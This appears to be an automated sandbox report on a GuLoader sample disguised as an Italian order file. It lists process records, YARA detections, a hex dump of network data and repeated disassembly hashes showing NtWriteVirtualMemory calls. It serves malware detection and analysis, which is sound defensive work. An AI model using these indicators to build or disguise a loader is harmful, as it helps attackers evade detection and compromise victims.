                                              2021-11-25 09:47:52 UTC101INData Raw: d5 46 d7 d1 46 94 d0 92 77 10 e2 fd f5 a5 fd b0 de ff 7a 77 a7 0a cc 8e f9 2d f1 88 2c 45 69 26 80 c1 6e 36 54 aa fe ea bd 5a e2 b1 e0 ee 1f ba 10 56 c7 43 ac 34 ad 34 59 ee 48 0e c3 7d 0d 05 a2 13 63 8e ce 9e c8 cf 18 1f eb 6a 4b ef 6d 09 e9 e5 b1 f1 28 a7 48 17 a8 bb 4a bb 36 df 7d 4a ce 94 c5 e8 9c 2b eb 72 f8 2c 83 00 a9 96 2e b6 19 36 be 7f ef f9 c7 54 39 54 16 56 e6 78 ff 30 e7 d5 19 fd 07 41 ba c5 7e a9 7f bf 28 6c 89 5d 36 40 d6 e3 03 90 1c 53 9f 71 9d 0c ca 46 b0 8b 70 8e 5f 13 fc 6f dc fd 80 5c c6 72 3d f5 2e 48 ea a8 4b c9 c2 b6 a2 ed 28 13 4d f4 4d 51 bd d5 2b ff 29 7f 3b 02 6f de 46 ea d6 2e d0 e2 f8 59 44 16 d1 d5 f8 bf e2 51 15 7f 02 9d 5f cc 79 99 25 a2 a6 96 9f d6 0d 4d 91 fa b0 0b 0c f5 60 ae f3 55 8e 49 ad 73 c8 ca 47 5f ca 6e df 58 26
                                              Data Ascii: FFwzw-,Ei&n6TZVC44YH}cjKm(HJ6}J+r,.6T9TVx0A~(l]6@SqFp_o\r=.HK(MMQ+);oF.YDQ_y%M`UIsG_nX&


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:10:47:06
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
                                              Imagebase:0x400000
                                              File size:164928 bytes
                                              MD5 hash:F5423B7A89876044078CBB68DB883AF8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Visual Basic
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:10:47:28
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
                                              Imagebase:0x400000
                                              File size:164928 bytes
                                              MD5 hash:F5423B7A89876044078CBB68DB883AF8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:10:47:56
                                              Start date:25/11/2021
                                              Path:C:\Windows\System32\lsass.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\lsass.exe
                                              Imagebase:0x7ff71ff40000
                                              File size:59448 bytes
                                              MD5 hash:15A556DEF233F112D127025AB51AC2D3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 0-301809174
                                                • Opcode ID: a78ec1979fad319ae86ee22e71654e81c172391c2a54601237d5a8b42eec6d38
                                                • Instruction ID: 14e0f8e9191f155067c7ca148cec33c6e0b4e7980a95742f3dd098bfbe418386
                                                • Opcode Fuzzy Hash: a78ec1979fad319ae86ee22e71654e81c172391c2a54601237d5a8b42eec6d38
                                                • Instruction Fuzzy Hash: 7972EF7151838ADFDB748F74CD85BEABBA2FF55310F05812ADC899B218D3704A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 0-301809174
                                                • Opcode ID: 414c78d7fa89eb72cf220084c65911dd919f947be4e014a7e0ab6d8e479bab57
                                                • Instruction ID: e58e4b04dbecd950424b1aa813cc15562dac3ba8826f2dda1564d571975eed7a
                                                • Opcode Fuzzy Hash: 414c78d7fa89eb72cf220084c65911dd919f947be4e014a7e0ab6d8e479bab57
                                                • Instruction Fuzzy Hash: 3C52CB72518389DFDB789F75CD857EABBA2FF55300F51422ADD899B214C3704A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: 4cf75e8f4b7e6306bcfc413030706de87409f21ada729788cf9d92d392d82154
                                                • Instruction ID: 10b89d549cbaa2d655db0c34e371c2a5455c09be1cf2b446ef86d8b14aab899e
                                                • Opcode Fuzzy Hash: 4cf75e8f4b7e6306bcfc413030706de87409f21ada729788cf9d92d392d82154
                                                • Instruction Fuzzy Hash: CD52DB72518389DFDB748F35CD857EABBA2FF59340F51422ADD899B224C3705A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: 4145ca35a026e410821053f5b6f8dac54fa3085eb901718999f83b0a6007933e
                                                • Instruction ID: 3cb8189638d2606b626444dde8d6de2d043c64ca4db4acfb1ced37e33a4e0baf
                                                • Opcode Fuzzy Hash: 4145ca35a026e410821053f5b6f8dac54fa3085eb901718999f83b0a6007933e
                                                • Instruction Fuzzy Hash: 7552CB72518389DFDB748F35CD857EABBA2FF59300F55422ADD899B224C3705A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: b5ec2b3edff064d971f4efb6dfdfaa17538fa91533f24f6e877a80323a3b2690
                                                • Instruction ID: a253d190501ce40e5b1f40a54de7740ac4f0325de10cd96db26090733992a66b
                                                • Opcode Fuzzy Hash: b5ec2b3edff064d971f4efb6dfdfaa17538fa91533f24f6e877a80323a3b2690
                                                • Instruction Fuzzy Hash: A742BA72518389DFDB748F39CD857EABBA2FF59300F55421ADD899B224C3705A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: 71d423370a473c1b2a8518cf6dca87fb9ee14a8c63f384e1b22a270d03069cdc
                                                • Instruction ID: 5c1b3c2c869e90525b1925aab4c96ae1dda373cee1eb4d26f74f76591a3ee268
                                                • Opcode Fuzzy Hash: 71d423370a473c1b2a8518cf6dca87fb9ee14a8c63f384e1b22a270d03069cdc
                                                • Instruction Fuzzy Hash: 2542CB72918389DFCB748F29CD857EABBB2FF59310F55421ADD499B224C3705A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: 032d8c2667ad2cb0532e42010b1da94b2c5674580ad203ef52128f70773941c1
                                                • Instruction ID: 305ce900d2c1530d60624811b1bb9b4a70006fc592a96e175225ade4d25a9609
                                                • Opcode Fuzzy Hash: 032d8c2667ad2cb0532e42010b1da94b2c5674580ad203ef52128f70773941c1
                                                • Instruction Fuzzy Hash: 0542BA72518389DBDB749F39CD857EABBB2FF59300F15422ADD899B214C3705A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: 92c4aa271325d32145404accf2a3ec00101aef3fa02dc2e29e4711d2f1dff67e
                                                • Instruction ID: 3c0f8d1740e5114caedcad64f4a6fc553aaa2ec6b82da055f9406aefffb82920
                                                • Opcode Fuzzy Hash: 92c4aa271325d32145404accf2a3ec00101aef3fa02dc2e29e4711d2f1dff67e
                                                • Instruction Fuzzy Hash: D632DB72918389DFCB748F79CD857EABBA2FF59300F55421ADD499B224C3705A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: 36b398a6a167bbd8039759912ced02e7f5cdc6186351eca173df153161ad4112
                                                • Instruction ID: 9b20aebefb5c1895890a0614fe7264a12e803cb60c911df3e4a54b3e3ccb9da6
                                                • Opcode Fuzzy Hash: 36b398a6a167bbd8039759912ced02e7f5cdc6186351eca173df153161ad4112
                                                • Instruction Fuzzy Hash: CE22CA72518389DFCB748F39CD857EABBA2FF59310F55421ADD499B224C3709A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N$GF
                                                • API String ID: 3527976591-301809174
                                                • Opcode ID: 0d5faef0f45b2e36f7b43e5c6ad4eed12278e3c990de679e48745dfb1e7ad63e
                                                • Instruction ID: e13978e107375d86a0428168c1d3324c42b36c95f504044608c852cfed080483
                                                • Opcode Fuzzy Hash: 0d5faef0f45b2e36f7b43e5c6ad4eed12278e3c990de679e48745dfb1e7ad63e
                                                • Instruction Fuzzy Hash: C422B872518389DFCB748F39CD857EABBB2BF59300F55421ADD499B224C3709A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #~:$F2x$?C$Q(N
                                                • API String ID: 0-91808544
                                                • Opcode ID: 800a9478d7851277b7ecc13f572faf94adbdd0327ceaad7732d8e4e0cd92a37d
                                                • Instruction ID: 73677cdcb830950bd5b1f73022c2982cfe32a7ce0d2fb56272d15e96b8bf851c
                                                • Opcode Fuzzy Hash: 800a9478d7851277b7ecc13f572faf94adbdd0327ceaad7732d8e4e0cd92a37d
                                                • Instruction Fuzzy Hash: 6C22DB72518389DFCB748F79CD857EABBB1BF59300F55421AD8499B224C3709A82CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N
                                                • API String ID: 3527976591-91808544
                                                • Opcode ID: 867516c6307dd69ead084436c8be98958e04124a8b21aa01fe1a8fc9557b43bc
                                                • Instruction ID: 93fa19241dc7e9f296298a56ffb436d9a53735d83d9f67dfde117f6699881652
                                                • Opcode Fuzzy Hash: 867516c6307dd69ead084436c8be98958e04124a8b21aa01fe1a8fc9557b43bc
                                                • Instruction Fuzzy Hash: D122CA72518389DFDB748F78CD857EABBB2BF59300F55421AD9499B224C3709A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #~:$F2x$?C$Q(N
                                                • API String ID: 0-91808544
                                                • Opcode ID: 6dbaba5ad57e9ed0cf76cdcf2369ba52d4c4b4b7db2182bc5181ada153ebc862
                                                • Instruction ID: 9d5850eb5f789367b0a3e0df8d9440c4455a4f16a5ef975a35f6e0ca16531f5a
                                                • Opcode Fuzzy Hash: 6dbaba5ad57e9ed0cf76cdcf2369ba52d4c4b4b7db2182bc5181ada153ebc862
                                                • Instruction Fuzzy Hash: 4512C972518389DFDB748F78CD857EABBB2BF59300F51421ADD499B224C3709A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$F2x$?C$Q(N
                                                • API String ID: 3527976591-91808544
                                                • Opcode ID: 6b0c46334869a6283af89f80bdc66d0f667b72ce4e1acaafbc50be70c0bbeb77
                                                • Instruction ID: 99f0680dd99a9185d98cc7922e293320e52b14b895da37af418970271b787476
                                                • Opcode Fuzzy Hash: 6b0c46334869a6283af89f80bdc66d0f667b72ce4e1acaafbc50be70c0bbeb77
                                                • Instruction Fuzzy Hash: AF12C972518389DFDF748F79CD85BEABBA2BF59300F55011ADD499B224C3709A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #~:$F2x$?C$Q(N
                                                • API String ID: 0-91808544
                                                • Opcode ID: 832184d34e23248d1b6acda03b0fc4ab0c5a201c723b624907029d686e1996ca
                                                • Instruction ID: 5f8a52b24e4cebee82ca2b86e7276fb2404a6d0f7b9500f84cb88082935cf616
                                                • Opcode Fuzzy Hash: 832184d34e23248d1b6acda03b0fc4ab0c5a201c723b624907029d686e1996ca
                                                • Instruction Fuzzy Hash: C412B972518389DFDB748F79CD857EABBB2BF59300F51411ADD499B224C3709A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$?C$Q(N
                                                • API String ID: 3527976591-2595965422
                                                • Opcode ID: 7c91a6365c9078e2fdba7600a4dc173af292b4dd8f76aee7d44c5b5b977a1e2c
                                                • Instruction ID: cde1cc16e226981195b8c1b3ea074494dac7648d0932ac189a762088f91e392d
                                                • Opcode Fuzzy Hash: 7c91a6365c9078e2fdba7600a4dc173af292b4dd8f76aee7d44c5b5b977a1e2c
                                                • Instruction Fuzzy Hash: 3B02CC72518389DFDF748F79CD857EABBA2BF5A300F45011ADD499B224C7704A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$?C$Q(N
                                                • API String ID: 3527976591-2595965422
                                                • Opcode ID: fa796b7e64a0053869bcd4d54528dc326cfc23ff5f99ab6b0beaf279796124d0
                                                • Instruction ID: 31b0359529c1c8358ba77ed914b1929e9ec2a1963d78ff9ec35fb89e09ddc21a
                                                • Opcode Fuzzy Hash: fa796b7e64a0053869bcd4d54528dc326cfc23ff5f99ab6b0beaf279796124d0
                                                • Instruction Fuzzy Hash: 3102AA72518389DFDF748E79CD85BEABBB2BF5A300F55011ADD499B224C7704A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$?C$Q(N
                                                • API String ID: 3527976591-2595965422
                                                • Opcode ID: 92bf12c7961fa04bbd9608f6fb83067dac71d3dfc2eb8f2fabf09f877bcbc82f
                                                • Instruction ID: a54e3f50d9ee5b9309dd8c1565945e1973b5d48ae182324dd19a1ea75d7bd455
                                                • Opcode Fuzzy Hash: 92bf12c7961fa04bbd9608f6fb83067dac71d3dfc2eb8f2fabf09f877bcbc82f
                                                • Instruction Fuzzy Hash: D2F1CA72518289DFDF748E79CC85BEABBB2FF5A300F45011ADD499B224C7704A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: #~:$?C$Q(N
                                                • API String ID: 3527976591-2595965422
                                                • Opcode ID: 03519c30586dd93d6f4849c1f2ed49313eee57a3db7f339f7b9d615ba9597626
                                                • Instruction ID: 41a0c5ff621b94ca0bdd264022a416bf61d90297f31bec2d6cbd0e669e9ae084
                                                • Opcode Fuzzy Hash: 03519c30586dd93d6f4849c1f2ed49313eee57a3db7f339f7b9d615ba9597626
                                                • Instruction Fuzzy Hash: 8DE1B872518289DFDF748E78CC85BEABBB2FF5A300F45011ADD499B224C7705A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: ?C$Q(N
                                                • API String ID: 3527976591-605336953
                                                • Opcode ID: 1edf4fa5e51447f2a1bc387115a223158f28b8eeca1c6f91027c59626806cb7c
                                                • Instruction ID: 152cd33d90d776d07b11709c5169efbce2193926b2d927fe7a7da40e8c9b1411
                                                • Opcode Fuzzy Hash: 1edf4fa5e51447f2a1bc387115a223158f28b8eeca1c6f91027c59626806cb7c
                                                • Instruction Fuzzy Hash: 78D1A972518289DFDF758E78CC85BEABBB2FF59300F45411ADD499B224C7704A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: Q(N
                                                • API String ID: 3527976591-2316863436
                                                • Opcode ID: c3ad4468bb06082f4176fe48e39d48738766837983fa0e683a5a86e0c46a664d
                                                • Instruction ID: 3ea686616ef893a0c5485ea4d904a367296a382e10d8aca2773c1a979310a806
                                                • Opcode Fuzzy Hash: c3ad4468bb06082f4176fe48e39d48738766837983fa0e683a5a86e0c46a664d
                                                • Instruction Fuzzy Hash: 7AC1A772518289DFDF758E79CC85BEABBA1BF59300F45412ADD489B224C7709A81CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: Q(N
                                                • API String ID: 3527976591-2316863436
                                                • Opcode ID: 284755a4f54cb23486256bc82324e08cce23c02546ce5b735e2a2cfdc31b5b6b
                                                • Instruction ID: 0bc7ac855a6fe17749c14c1634663df8c24bc6b9b6290aebec48ef32fa922d44
                                                • Opcode Fuzzy Hash: 284755a4f54cb23486256bc82324e08cce23c02546ce5b735e2a2cfdc31b5b6b
                                                • Instruction Fuzzy Hash: EBB1A875519289DFCF758F78CC8ABDA7BA1BF19300F45412ADD489B224C7704A41CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: Q(N
                                                • API String ID: 3527976591-2316863436
                                                • Opcode ID: 401185b486afc839a10fa4c508d06abde6dfa652a42704e275b271ccc40f703a
                                                • Instruction ID: 9facb388f3b83ae07448daaaf1271e51dfeb1f7554902ea62825027aa5cc4931
                                                • Opcode Fuzzy Hash: 401185b486afc839a10fa4c508d06abde6dfa652a42704e275b271ccc40f703a
                                                • Instruction Fuzzy Hash: 92A19775519289DFCF758F78CC86BEA7BB2BF19300F45412AD9489B224C7705A51CF82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: Q(N
                                                • API String ID: 3527976591-2316863436
                                                • Opcode ID: 09eb24934858b790b51d8c6df7af1fd55f8d0eaffa5e7b3c313e433f52331158
                                                • Instruction ID: bfb67bb98b99385f8f10a8d8cd8df2b8fe6a6ed4d888d5e6e6b7dc4cc7d52b86
                                                • Opcode Fuzzy Hash: 09eb24934858b790b51d8c6df7af1fd55f8d0eaffa5e7b3c313e433f52331158
                                                • Instruction Fuzzy Hash: 1E91A875919288DFCF759F79CC85BDABBB2FF49300F44411AD9489B225C7704A46CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID: Q(N
                                                • API String ID: 3527976591-2316863436
                                                • Opcode ID: 8bb10a981d1fb912e69994e5c818ef9c7146e1498ae0b946f4ff9f4abbf2826a
                                                • Instruction ID: 3de9c55da77f9e7881c824c2f108fbef230ea55323620d013b417319683c63b6
                                                • Opcode Fuzzy Hash: 8bb10a981d1fb912e69994e5c818ef9c7146e1498ae0b946f4ff9f4abbf2826a
                                                • Instruction Fuzzy Hash: D971BAB1919288DFDF759F79CC85BEABBB2FF48300F44412AD9489B225C7705A45CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ea9cd7e106ea7b86e29f60197ee5893f6e15f497b19ddb5c602b1bf8c4f026c
                                                • Instruction ID: e3f245c72e98ce5317b217e3bb767a754ba2be7a5dc6733a604ad55812bd1c0e
                                                • Opcode Fuzzy Hash: 2ea9cd7e106ea7b86e29f60197ee5893f6e15f497b19ddb5c602b1bf8c4f026c
                                                • Instruction Fuzzy Hash: 3E912735628349CFCF39DEB8C9D97D63BA2AF5A314F45011ACC098B349D7709A42CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 325d1afa6b7d5b696bc89261ce241730cb372a830eca6a3f0dd963a7e6f4d262
                                                • Instruction ID: aeac02c61d116f7d401ddf5ff71c26adb79d926904eb136e9efe8fcc494c2a85
                                                • Opcode Fuzzy Hash: 325d1afa6b7d5b696bc89261ce241730cb372a830eca6a3f0dd963a7e6f4d262
                                                • Instruction Fuzzy Hash: 3B710235668249CFCF258EA8C9D97DA3BA2BF5A310F41015ACC099F359C7719A42CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da6485ddc88c0b965745fc5a94d0370c3df5e16805831f33f22e7d8990780251
                                                • Instruction ID: 534d6d985fe2b137d787bc80e887710ea83c53eb5db27eb48a270568702759c0
                                                • Opcode Fuzzy Hash: da6485ddc88c0b965745fc5a94d0370c3df5e16805831f33f22e7d8990780251
                                                • Instruction Fuzzy Hash: DA71F335628249CFCF25CEA8C9D97D63BB2BF5A314F41015ACC099F359C7719A02CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16cb63c652a8c63e83e7ee08412792372fdd00474749301685a3a617042dd3be
                                                • Instruction ID: 830e9e49f610e2b999cf91edf2377b791efcb0c20476dba22f5386ac4fb87919
                                                • Opcode Fuzzy Hash: 16cb63c652a8c63e83e7ee08412792372fdd00474749301685a3a617042dd3be
                                                • Instruction Fuzzy Hash: AE71E235668249CFCF25CEA8C9D97DA3BA2BF1A314F45015ACC099F359C7719A02CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d9787cf0d71b0521727d5a11e5939b6a35262b394bd27761efadde1e4e79b30b
